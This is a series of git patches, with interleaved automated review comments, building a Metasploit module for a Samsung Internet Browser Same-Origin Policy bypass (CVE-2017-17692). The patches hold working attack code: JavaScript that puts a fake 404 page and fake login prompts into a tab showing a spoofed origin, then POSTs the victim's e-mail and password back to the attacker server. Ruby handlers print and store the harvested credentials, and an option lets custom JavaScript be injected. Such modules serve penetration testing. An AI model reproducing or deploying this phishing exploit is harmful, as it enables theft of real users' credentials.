From 3dad025b8cdc784791ac756d66508f6573431024 Mon Sep 17 00:00:00 2001 From: RootUp Date: Tue, 7 Nov 2017 14:24:50 +0530 Subject: [PATCH 01/16] Create browser_sop_bypass.rb --- .../auxiliary/gather/browser_sop_bypass.rb | 54 +++++++++++++++++++ 1 file changed, 54 insertions(+) create mode 100644 modules/auxiliary/gather/browser_sop_bypass.rb diff --git a/modules/auxiliary/gather/browser_sop_bypass.rb b/modules/auxiliary/gather/browser_sop_bypass.rb new file mode 100644 index 0000000000..cd73a6ad61 --- /dev/null +++ b/modules/auxiliary/gather/browser_sop_bypass.rb @@ -0,0 +1,54 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Auxiliary + include Msf::Exploit::Remote::HttpServer + Rank = GoodRanking + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => "Browser SOP Bypass", + 'Description' => %q( + This module do a server-redirect combined with a data-URI end up bypassing the Same Origin Policy,which leads to all kind of vulnerabilities like stealing user passwords. + ), + 'License' => MSF_LICENSE, + 'Author' => [ + 'Dhiraj Mishra', + ], + 'References' => [ + [ 'URL', 'http://fr.0day.today/exploit/description/28434'], + ], + 'DisclosureDate' => "Nov 09 2017", + 'Actions' => [[ 'WebServer' ]], + 'PassiveActions' => [ 'WebServer' ], + 'DefaultAction' => 'WebServer' + ) + ) + end + + def run + exploit # start http server + end + + def setup + @html = %| + + + + | + end + + def on_request_uri(cli, _request) + print_status('Sending response') + send_response(cli, @html) + end +end From 2fad61101e560eb2e238cf2d722cf00d19fddc0f Mon Sep 17 00:00:00 2001 From: RootUp Date: Tue, 7 Nov 2017 21:13:06 +0530 Subject: [PATCH 02/16] Update browser_sop_bypass.rb --- modules/auxiliary/gather/browser_sop_bypass.rb | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) 
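Review bot: The metadata passed to `update_info` does not let a reader tell what is affected: the `Description` names no browser or version, and `References` carries a single third-party listing URL with no vendor advisory or CVE. `'DisclosureDate' => "Nov 09 2017"` is also two days later than this commit's own date of 7 Nov 2017, so one of the two is wrong. I would name the affected product and version range in the description and correct the date. The markup inside the `setup` template is not visible in this view, so it is not covered by this note.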
diff --git a/modules/auxiliary/gather/browser_sop_bypass.rb b/modules/auxiliary/gather/browser_sop_bypass.rb index cd73a6ad61..39ff69200b 100644 --- a/modules/auxiliary/gather/browser_sop_bypass.rb +++ b/modules/auxiliary/gather/browser_sop_bypass.rb @@ -5,7 +5,6 @@ class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer - Rank = GoodRanking def initialize(info = {}) super( @@ -19,8 +18,8 @@ class MetasploitModule < Msf::Auxiliary 'Author' => [ 'Dhiraj Mishra', ], - 'References' => [ - [ 'URL', 'http://fr.0day.today/exploit/description/28434'], + 'References' => + ['URL', 'http://fr.0day.today/exploit/description/28434'], ], 'DisclosureDate' => "Nov 09 2017", 'Actions' => [[ 'WebServer' ]], From 872894f74323a5213c2db6153585b57ecd0c44dc Mon Sep 17 00:00:00 2001 From: RootUp Date: Tue, 7 Nov 2017 21:29:16 +0530 Subject: [PATCH 03/16] Update browser_sop_bypass.rb --- modules/auxiliary/gather/browser_sop_bypass.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/gather/browser_sop_bypass.rb b/modules/auxiliary/gather/browser_sop_bypass.rb index 39ff69200b..40b0809c24 100644 --- a/modules/auxiliary/gather/browser_sop_bypass.rb +++ b/modules/auxiliary/gather/browser_sop_bypass.rb @@ -18,7 +18,7 @@ class MetasploitModule < Msf::Auxiliary 'Author' => [ 'Dhiraj Mishra', ], - 'References' => + 'References' => [ ['URL', 'http://fr.0day.today/exploit/description/28434'], ], 'DisclosureDate' => "Nov 09 2017", From 0c247d563583fa637fa74de59f2f6bbe69dc6c08 Mon Sep 17 00:00:00 2001 From: RootUp Date: Wed, 8 Nov 2017 12:38:37 +0530 Subject: [PATCH 04/16] Update browser_sop_bypass.rb --- modules/auxiliary/gather/browser_sop_bypass.rb | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/modules/auxiliary/gather/browser_sop_bypass.rb b/modules/auxiliary/gather/browser_sop_bypass.rb index 40b0809c24..8a3430997d 100644 --- a/modules/auxiliary/gather/browser_sop_bypass.rb 
+++ b/modules/auxiliary/gather/browser_sop_bypass.rb @@ -10,9 +10,10 @@ class MetasploitModule < Msf::Auxiliary super( update_info( info, - 'Name' => "Browser SOP Bypass", + 'Name' => "Samsung Internet Browser SOP Bypass", 'Description' => %q( - This module do a server-redirect combined with a data-URI end up bypassing the Same Origin Policy,which leads to all kind of vulnerabilities like stealing user passwords. + This module opens up and does a server-redirect to child tab using document.body.innerHTML funtion, the child tab creates a fake pop up asking email ID, Password. + Once entered the credentials is passed back to the parent tab, In this case the address bar points to google.com/csi which actually can be used to trick some one. ), 'License' => MSF_LICENSE, 'Author' => [ @@ -21,7 +22,7 @@ class MetasploitModule < Msf::Auxiliary 'References' => [ ['URL', 'http://fr.0day.today/exploit/description/28434'], ], - 'DisclosureDate' => "Nov 09 2017", + 'DisclosureDate' => "Nov 08 2017", 'Actions' => [[ 'WebServer' ]], 'PassiveActions' => [ 'WebServer' ], 'DefaultAction' => 'WebServer' From 03cd8af29a81b4b54f806d888e9663658a0c1543 Mon Sep 17 00:00:00 2001 From: RootUp Date: Wed, 8 Nov 2017 12:50:49 +0530 Subject: [PATCH 05/16] Update browser_sop_bypass.rb --- modules/auxiliary/gather/browser_sop_bypass.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/gather/browser_sop_bypass.rb b/modules/auxiliary/gather/browser_sop_bypass.rb index 8a3430997d..c75c030185 100644 --- a/modules/auxiliary/gather/browser_sop_bypass.rb +++ b/modules/auxiliary/gather/browser_sop_bypass.rb 
@@ -12,7 +12,7 @@ class MetasploitModule < Msf::Auxiliary info, 'Name' => "Samsung Internet Browser SOP Bypass", 'Description' => %q( - This module opens up and does a server-redirect to child tab using document.body.innerHTML funtion, the child tab creates a fake pop up asking email ID, Password. + This module opens up and does a server-redirect to child tab using document.body.innerHTML funtion, the child tab creates a fake pop up asking email ID, Password. Once entered the credentials is passed back to the parent tab, In this case the address bar points to google.com/csi which actually can be used to trick some one. ), 'License' => MSF_LICENSE, From aee883a706ad842c87facf4b17bb4c08996bcb4c Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Fri, 8 Dec 2017 12:24:58 -0600 Subject: [PATCH 06/16] Fixed up description to be descriptive --- modules/auxiliary/gather/browser_sop_bypass.rb | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/gather/browser_sop_bypass.rb b/modules/auxiliary/gather/browser_sop_bypass.rb index c75c030185..ec1f3e0208 100644 --- a/modules/auxiliary/gather/browser_sop_bypass.rb +++ b/modules/auxiliary/gather/browser_sop_bypass.rb 
@@ -12,8 +12,12 @@ class MetasploitModule < Msf::Auxiliary info, 'Name' => "Samsung Internet Browser SOP Bypass", 'Description' => %q( - This module opens up and does a server-redirect to child tab using document.body.innerHTML funtion, the child tab creates a fake pop up asking email ID, Password. - Once entered the credentials is passed back to the parent tab, In this case the address bar points to google.com/csi which actually can be used to trick some one. + This module takes advantage of a Same-Origin Policy (SOP) bypass vulnerability in the + Samsung Internet Browser, a popular mobile browser shipping with Samsung Android devices. + It initiates a server-redirect to a child tab using the document.body.innerHTML + function, which causes the child tab to create a fake pop-up. This pop-up prompts the user + for a username and password which appears to originate from the targeted URL's domain. Once + entered, the credentials are passed to the parent tab as well as stored locally. ), 'License' => MSF_LICENSE, 'Author' => [ From 0a9dcafb776522fb1d8febeb89d9d1bd4264108f Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Fri, 8 Dec 2017 13:51:02 -0600 Subject: [PATCH 07/16] Actually collect the creds, sort of Instead of an alert() (which the attacker won't see), this collects the offered credentials in a POST action, and displays them in the console. This should further store the creds somewhere handy, but this is good enough for now for testing from @RootUp --- .../auxiliary/gather/browser_sop_bypass.rb | 72 +++++++++++++++---- 1 file changed, 59 insertions(+), 13 deletions(-) diff --git a/modules/auxiliary/gather/browser_sop_bypass.rb b/modules/auxiliary/gather/browser_sop_bypass.rb index ec1f3e0208..e43f1ae81b 100644 --- a/modules/auxiliary/gather/browser_sop_bypass.rb +++ b/modules/auxiliary/gather/browser_sop_bypass.rb 
@@ -32,6 +32,20 @@ class MetasploitModule < Msf::Auxiliary 'DefaultAction' => 'WebServer' ) ) + + register_options([ + OptString.new('TARGET_URL', [ + true, + "The URL to spoof origin from.", + 'http://example.com' + ]), + OptString.new('CUSTOM_HTML', [ + true, + "HTML to display to the victim.", + 'This page has moved. Please click here redirect your browser.' + ]), + + ]) end def run @@ -39,20 +53,52 @@ class MetasploitModule < Msf::Auxiliary end def setup - @html = %| - - - - | + @html = <<-EOS + + + + + #{datastore['CUSTOM_HTML']} + + EOS end - def on_request_uri(cli, _request) - print_status('Sending response') - send_response(cli, @html) + # TODO: This does not actually save the credential, since it's gathered from the user + # and there's no real solid way to associate it with the domain part of the target_url. + # Suggestions welcome if this should be saved with store_loot or just make a guess on the + # target. + def collect_data(request) + creds = JSON.parse(request.body) + u = creds['user'] + p = creds['pass'] + print_good("#{cli.peerhost}: Collected credential for '#{datastore['TARGET_URL']}' #{u}:#{p}") end + + def on_request_uri(cli, request) + case request.method.downcase + when 'get' # initial connection + print_status("#{cli.peerhost}: Request '#{request.method} #{request.uri}'") + print_status("#{cli.peerhost}: Attempting to spoof origin for #{datastore['TARGET_URL']}") + send_response(cli, @html) + when 'post' # must have fallen for it + collect_data(request) + else + print_error("#{cli.peerhost}: Unhandled method: #{request.method}") + end + end + end From cba5c7cb0fd7a1b6a88f2bf8e85be120c46fcf38 Mon Sep 17 00:00:00 2001 
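Review bot: In the `@@ -39,20 +53,52 @@` hunk, `collect_data` runs `JSON.parse(request.body)` on a client-supplied body with no error handling, so a non-JSON POST raises inside the request handler, and a body that parses to an array or scalar fails on `creds['user']`. A `rescue JSON::ParserError` around the parse plus `return unless creds.is_a?(Hash)` would contain both; the same unguarded parse is carried through the later `collect_data` hunks in patches 10 and 13. The method also reads `cli`, which is not one of its parameters; it presumably resolves through the HttpServer mixin, but `collect_data(cli, request)` would make the dependency explicit. The `print_good` line writes the submitted password in clear text, so it ends up in any console spool or log; masking it there and keeping the value only in the credential store would limit where it is copied.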
From: Tod Beardsley Date: Fri, 8 Dec 2017 13:53:13 -0600 Subject: [PATCH 08/16] Rename to actually call out the browser name --- .../{browser_sop_bypass.rb => samsung_browser_sop_bypass.rb} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/auxiliary/gather/{browser_sop_bypass.rb => samsung_browser_sop_bypass.rb} (100%) diff --git a/modules/auxiliary/gather/browser_sop_bypass.rb b/modules/auxiliary/gather/samsung_browser_sop_bypass.rb similarity index 100% rename from modules/auxiliary/gather/browser_sop_bypass.rb rename to modules/auxiliary/gather/samsung_browser_sop_bypass.rb From 5f701992185e1aa13e54f888cd987a54de255297 Mon Sep 17 00:00:00 2001 From: RootUp Date: Tue, 12 Dec 2017 15:52:55 +0530 Subject: [PATCH 09/16] Update samsung_browser_sop_bypass.rb --- modules/auxiliary/gather/samsung_browser_sop_bypass.rb | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/gather/samsung_browser_sop_bypass.rb b/modules/auxiliary/gather/samsung_browser_sop_bypass.rb index e43f1ae81b..ade53e098b 100644 --- a/modules/auxiliary/gather/samsung_browser_sop_bypass.rb +++ b/modules/auxiliary/gather/samsung_browser_sop_bypass.rb @@ -21,7 +21,9 @@ class MetasploitModule < Msf::Auxiliary ), 'License' => MSF_LICENSE, 'Author' => [ - 'Dhiraj Mishra', + 'Dhiraj Mishra', # Original discovery, disclosure + 'Tod Beardsley', # Metasploit module + 'Jeffrey Martin' # Metasploit module ], 'References' => [ ['URL', 'http://fr.0day.today/exploit/description/28434'], @@ -37,7 +39,7 @@ class MetasploitModule < Msf::Auxiliary OptString.new('TARGET_URL', [ true, "The URL to spoof origin from.", - 'http://example.com' + 'http://example.com/' ]), OptString.new('CUSTOM_HTML', [ true, From efa46efb4883fbaff1d3277432b5116fab012101 Mon Sep 17 00:00:00 2001 
From: Tod Beardsley Date: Tue, 12 Dec 2017 14:06:18 -0600 Subject: [PATCH 10/16] Actually save creds, or fail through sanely This incidentally also allows for a custom collector to be implemented by the user -- for example, if they'd rather pick up a session ID or inject a browser hook or something along those lines. It's a little clunky, using the advanced option of CUSTOM_JS, but it seems to work fine. --- .../gather/samsung_browser_sop_bypass.rb | 83 ++++++++++++++----- 1 file changed, 60 insertions(+), 23 deletions(-) diff --git a/modules/auxiliary/gather/samsung_browser_sop_bypass.rb b/modules/auxiliary/gather/samsung_browser_sop_bypass.rb index ade53e098b..f570af0928 100644 --- a/modules/auxiliary/gather/samsung_browser_sop_bypass.rb +++ b/modules/auxiliary/gather/samsung_browser_sop_bypass.rb @@ -14,10 +14,8 @@ class MetasploitModule < Msf::Auxiliary 'Description' => %q( This module takes advantage of a Same-Origin Policy (SOP) bypass vulnerability in the Samsung Internet Browser, a popular mobile browser shipping with Samsung Android devices. - It initiates a server-redirect to a child tab using the document.body.innerHTML - function, which causes the child tab to create a fake pop-up. This pop-up prompts the user - for a username and password which appears to originate from the targeted URL's domain. Once - entered, the credentials are passed to the parent tab as well as stored locally. + By default, it initiates a redirect to a child tab, and rewrites the innerHTML to gather + credentials via a fake pop-up. ), 'License' => MSF_LICENSE, 'Author' => [ 
@@ -46,14 +44,42 @@ class MetasploitModule < Msf::Auxiliary "HTML to display to the victim.", 'This page has moved. Please click here redirect your browser.' ]), - ]) + + register_advanced_options([ + OptString.new('CUSTOM_JS', [ + false, + "Custom Javascript to inject as the go() function. Use the variable 'x' to refer to the new tab.", + '' + ]) + ]) + end def run exploit # start http server end + def evil_javascript + if not datastore['CUSTOM_JS'].nil? and not datastore['CUSTOM_JS'].empty? + js = datastore['CUSTOM_JS'] + else + js = <<-EOS + setTimeout(function(){ + x.document.body.innerHTML='

404 Error

'+ + '

Oops, something went wrong.

'; + a=x.prompt('E-mail',''); + b=x.prompt('Password',''); + var cred=JSON.stringify({'user':a,'pass':b}); + var xmlhttp = new XMLHttpRequest; + xmlhttp.open('POST', window.location, true); + xmlhttp.send(cred); + }, 3000); + EOS + end + return js + end + def setup @html = <<-EOS @@ -61,16 +87,7 @@ class MetasploitModule < Msf::Auxiliary @@ -79,15 +96,35 @@ class MetasploitModule < Msf::Auxiliary EOS end - # TODO: This does not actually save the credential, since it's gathered from the user - # and there's no real solid way to associate it with the domain part of the target_url. - # Suggestions welcome if this should be saved with store_loot or just make a guess on the - # target. + def store_cred(username,password) + credential_data = { + origin_type: :import, + module_fullname: self.fullname, + filename: 'msfconsole', + workspace_id: myworkspace_id, + service_name: 'web_service', + realm_value: datastore['TARGET_URL'], + realm_key: Metasploit::Model::Realm::Key::WILDCARD, + private_type: :password, + private_data: password, + username: username + } + create_credential(credential_data) + end + + # This assumes the default schema is being used. + # If it's not that, it'll just display the collected POST data. def collect_data(request) - creds = JSON.parse(request.body) - u = creds['user'] - p = creds['pass'] - print_good("#{cli.peerhost}: Collected credential for '#{datastore['TARGET_URL']}' #{u}:#{p}") + cred = JSON.parse(request.body) + u = cred['user'] + p = cred['pass'] + if not u.nil? and not u.empty? and not p.nil? and not p.empty? + print_good("#{cli.peerhost}: Collected credential for '#{datastore['TARGET_URL']}' #{u}:#{p}") + store_cred(u,p) + # Do some cred storage here + else + print_good("#{cli.peerhost}: POST data received from #{datastore['TARGET_URL']}: #{request.body}") + end end def on_request_uri(cli, request) From 622050ddfc2a24bbd3da5fb4a6600756872b8871 Mon Sep 17 00:00:00 2001 
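Review bot: In the `@@ -79,15 +96,35 @@` hunk, the fallback branch of `collect_data` interpolates `request.body` straight into `print_good`, so whatever bytes a remote client posts, control characters included, are written to the operator's console and any spooled log; printing `request.body.inspect` (or a length-capped, escaped form) would keep that output inert. The same message says the data was received "from" `datastore['TARGET_URL']`, but the sender is `cli.peerhost` and the option is only the configured target, so `for` would match the success branch and the facts. In `store_cred`, `origin_type: :import` with `filename: 'msfconsole'` looks like a placeholder rather than a description of where the credential came from; worth confirming against the credential API before merging.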
From: Tod Beardsley Date: Tue, 12 Dec 2017 14:48:00 -0600 Subject: [PATCH 11/16] Oops, leftover comment --- modules/auxiliary/gather/samsung_browser_sop_bypass.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/auxiliary/gather/samsung_browser_sop_bypass.rb b/modules/auxiliary/gather/samsung_browser_sop_bypass.rb index f570af0928..246a3d58ad 100644 --- a/modules/auxiliary/gather/samsung_browser_sop_bypass.rb +++ b/modules/auxiliary/gather/samsung_browser_sop_bypass.rb @@ -121,7 +121,6 @@ class MetasploitModule < Msf::Auxiliary if not u.nil? and not u.empty? and not p.nil? and not p.empty? print_good("#{cli.peerhost}: Collected credential for '#{datastore['TARGET_URL']}' #{u}:#{p}") store_cred(u,p) - # Do some cred storage here else print_good("#{cli.peerhost}: POST data received from #{datastore['TARGET_URL']}: #{request.body}") end From 966060d470135e915e8d610613f49d6315d224bd Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Wed, 13 Dec 2017 16:38:17 -0600 Subject: [PATCH 12/16] Nits picked by @bcoles: commas, quotes, and --- .../auxiliary/gather/samsung_browser_sop_bypass.rb | 14 ++++++++------ 1 file changed, 8 insertions(+), 6 deletions(-) diff --git a/modules/auxiliary/gather/samsung_browser_sop_bypass.rb b/modules/auxiliary/gather/samsung_browser_sop_bypass.rb index 246a3d58ad..a34d918379 100644 --- a/modules/auxiliary/gather/samsung_browser_sop_bypass.rb +++ b/modules/auxiliary/gather/samsung_browser_sop_bypass.rb @@ -10,7 +10,7 @@ class MetasploitModule < Msf::Auxiliary super( update_info( info, - 'Name' => "Samsung Internet Browser SOP Bypass", + 'Name' => 'Samsung Internet Browser SOP Bypass', 'Description' => %q( This module takes advantage of a Same-Origin Policy (SOP) bypass vulnerability in the Samsung Internet Browser, a popular mobile browser shipping with Samsung Android devices. 
@@ -26,7 +26,7 @@ class MetasploitModule < Msf::Auxiliary 'References' => [ ['URL', 'http://fr.0day.today/exploit/description/28434'], ], - 'DisclosureDate' => "Nov 08 2017", + 'DisclosureDate' => 'Nov 08 2017', 'Actions' => [[ 'WebServer' ]], 'PassiveActions' => [ 'WebServer' ], 'DefaultAction' => 'WebServer' @@ -36,20 +36,20 @@ class MetasploitModule < Msf::Auxiliary register_options([ OptString.new('TARGET_URL', [ true, - "The URL to spoof origin from.", + 'The URL to spoof origin from.', 'http://example.com/' ]), OptString.new('CUSTOM_HTML', [ true, - "HTML to display to the victim.", + 'HTML to display to the victim.', 'This page has moved. Please click here redirect your browser.' - ]), + ]) ]) register_advanced_options([ OptString.new('CUSTOM_JS', [ false, - "Custom Javascript to inject as the go() function. Use the variable 'x' to refer to the new tab.", + 'Custom Javascript to inject as the go() function. Use the variable 'x' to refer to the new tab.', '' ]) ]) @@ -84,12 +84,14 @@ class MetasploitModule < Msf::Auxiliary @html = <<-EOS + + #{datastore['CUSTOM_HTML']} From 5226181d6d7ea23a5ed74888a0313108a88cea7b Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Wed, 13 Dec 2017 16:48:05 -0600 Subject: [PATCH 13/16] Better conditionals from @bcoles --- .../gather/samsung_browser_sop_bypass.rb | 46 +++++++++---------- 1 file changed, 22 insertions(+), 24 deletions(-) diff --git a/modules/auxiliary/gather/samsung_browser_sop_bypass.rb b/modules/auxiliary/gather/samsung_browser_sop_bypass.rb index a34d918379..ac739f8356 100644 --- a/modules/auxiliary/gather/samsung_browser_sop_bypass.rb +++ b/modules/auxiliary/gather/samsung_browser_sop_bypass.rb @@ -42,7 +42,7 @@ class MetasploitModule < Msf::Auxiliary OptString.new('CUSTOM_HTML', [ true, 'HTML to display to the victim.', - 'This page has moved. Please click here redirect your browser.' + 'This page has moved. Please click here to redirect your browser.' ]) ]) 
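Review bot: The `CUSTOM_JS` description in the `@@ -36,20 +36,20 @@` hunk is now wrapped in single quotes but still contains `'x'`, which ends the literal early and leaves the file unparsable. Keep double quotes on that one line, `"Custom Javascript to inject as the go() function. Use the variable 'x' to refer to the new tab."`, or escape the inner quotes.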
@@ -61,23 +61,20 @@ class MetasploitModule < Msf::Auxiliary end def evil_javascript - if not datastore['CUSTOM_JS'].nil? and not datastore['CUSTOM_JS'].empty? - js = datastore['CUSTOM_JS'] - else - js = <<-EOS - setTimeout(function(){ - x.document.body.innerHTML='

404 Error

'+ - '

Oops, something went wrong.

'; - a=x.prompt('E-mail',''); - b=x.prompt('Password',''); - var cred=JSON.stringify({'user':a,'pass':b}); - var xmlhttp = new XMLHttpRequest; - xmlhttp.open('POST', window.location, true); - xmlhttp.send(cred); - }, 3000); - EOS - end - return js + return datastore['CUSTOM_JS'] unless datastore['CUSTOM_JS'].blank? + js = <<-EOS + setTimeout(function(){ + x.document.body.innerHTML='

404 Error

'+ + '

Oops, something went wrong.

'; + a=x.prompt('E-mail',''); + b=x.prompt('Password',''); + var cred=JSON.stringify({'user':a,'pass':b}); + var xmlhttp = new XMLHttpRequest; + xmlhttp.open('POST', window.location, true); + xmlhttp.send(cred); + }, 3000); + EOS + js end def setup @@ -87,8 +84,10 @@ class MetasploitModule < Msf::Auxiliary @@ -120,11 +119,10 @@ class MetasploitModule < Msf::Auxiliary cred = JSON.parse(request.body) u = cred['user'] p = cred['pass'] - if not u.nil? and not u.empty? and not p.nil? and not p.empty? - print_good("#{cli.peerhost}: Collected credential for '#{datastore['TARGET_URL']}' #{u}:#{p}") - store_cred(u,p) - else + if u.blank? || p.blank? print_good("#{cli.peerhost}: POST data received from #{datastore['TARGET_URL']}: #{request.body}") + else + print_good("#{cli.peerhost}: Collected credential for '#{datastore['TARGET_URL']}' #{u}:#{p}") end end From 3b3b0e6e96e85cd95e1c1d114d814800a0a1b6a6 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Thu, 14 Dec 2017 14:27:41 -0600 Subject: [PATCH 14/16] And this is why I hate using single quotes Also, restored the store_cred call. This will fix up RootUp/metasploit-framework#3 for PR #9180 --- modules/auxiliary/gather/samsung_browser_sop_bypass.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/auxiliary/gather/samsung_browser_sop_bypass.rb b/modules/auxiliary/gather/samsung_browser_sop_bypass.rb index ac739f8356..b47b03dfd8 100644 --- a/modules/auxiliary/gather/samsung_browser_sop_bypass.rb +++ b/modules/auxiliary/gather/samsung_browser_sop_bypass.rb @@ -49,7 +49,7 @@ class MetasploitModule < Msf::Auxiliary register_advanced_options([ OptString.new('CUSTOM_JS', [ false, - 'Custom Javascript to inject as the go() function. Use the variable 'x' to refer to the new tab.', + "Custom Javascript to inject as the go() function. Use the variable 'x' to refer to the new tab.", '' ]) ]) 
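Review bot: The rewritten conditional in `collect_data` (the `@@ -120,11 +119,10 @@` hunk) no longer calls `store_cred(u,p)`: the old success branch had it, while the new `else` branch only prints. That is a behaviour change inside a commit described as a conditional cleanup, and it leaves `store_cred` without a caller in the visible code. Either keep the call in the `else` branch or state in the commit message that storage is being removed on purpose.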
@@ -123,6 +123,7 @@ class MetasploitModule < Msf::Auxiliary print_good("#{cli.peerhost}: POST data received from #{datastore['TARGET_URL']}: #{request.body}") else print_good("#{cli.peerhost}: Collected credential for '#{datastore['TARGET_URL']}' #{u}:#{p}") + store_cred(u,p) end end From 8f91377acbefc11a58dc01efe53874bfe8e11b5b Mon Sep 17 00:00:00 2001 From: RootUp Date: Sat, 16 Dec 2017 22:09:21 +0530 Subject: [PATCH 15/16] Update samsung_browser_sop_bypass.rb --- modules/auxiliary/gather/samsung_browser_sop_bypass.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/modules/auxiliary/gather/samsung_browser_sop_bypass.rb b/modules/auxiliary/gather/samsung_browser_sop_bypass.rb index b47b03dfd8..8786e66a5e 100644 --- a/modules/auxiliary/gather/samsung_browser_sop_bypass.rb +++ b/modules/auxiliary/gather/samsung_browser_sop_bypass.rb @@ -24,6 +24,7 @@ class MetasploitModule < Msf::Auxiliary 'Jeffrey Martin' # Metasploit module ], 'References' => [ + [ 'CVE', '2017-17692' ] ['URL', 'http://fr.0day.today/exploit/description/28434'], ], 'DisclosureDate' => 'Nov 08 2017', From 917dd8e846c9cf4ce15d1951b6480498a33f3df9 Mon Sep 17 00:00:00 2001 From: RootUp Date: Sat, 16 Dec 2017 22:10:02 +0530 Subject: [PATCH 16/16] Update samsung_browser_sop_bypass.rb --- modules/auxiliary/gather/samsung_browser_sop_bypass.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/gather/samsung_browser_sop_bypass.rb b/modules/auxiliary/gather/samsung_browser_sop_bypass.rb index 8786e66a5e..4efe26c029 100644 --- a/modules/auxiliary/gather/samsung_browser_sop_bypass.rb +++ b/modules/auxiliary/gather/samsung_browser_sop_bypass.rb 
@@ -24,8 +24,8 @@ class MetasploitModule < Msf::Auxiliary 'Jeffrey Martin' # Metasploit module ], 'References' => [ - [ 'CVE', '2017-17692' ] - ['URL', 'http://fr.0day.today/exploit/description/28434'], + [ 'CVE', '2017-17692' ], + ['URL', 'http://fr.0day.today/exploit/description/28434'] ], 'DisclosureDate' => 'Nov 08 2017', 'Actions' => [[ 'WebServer' ]],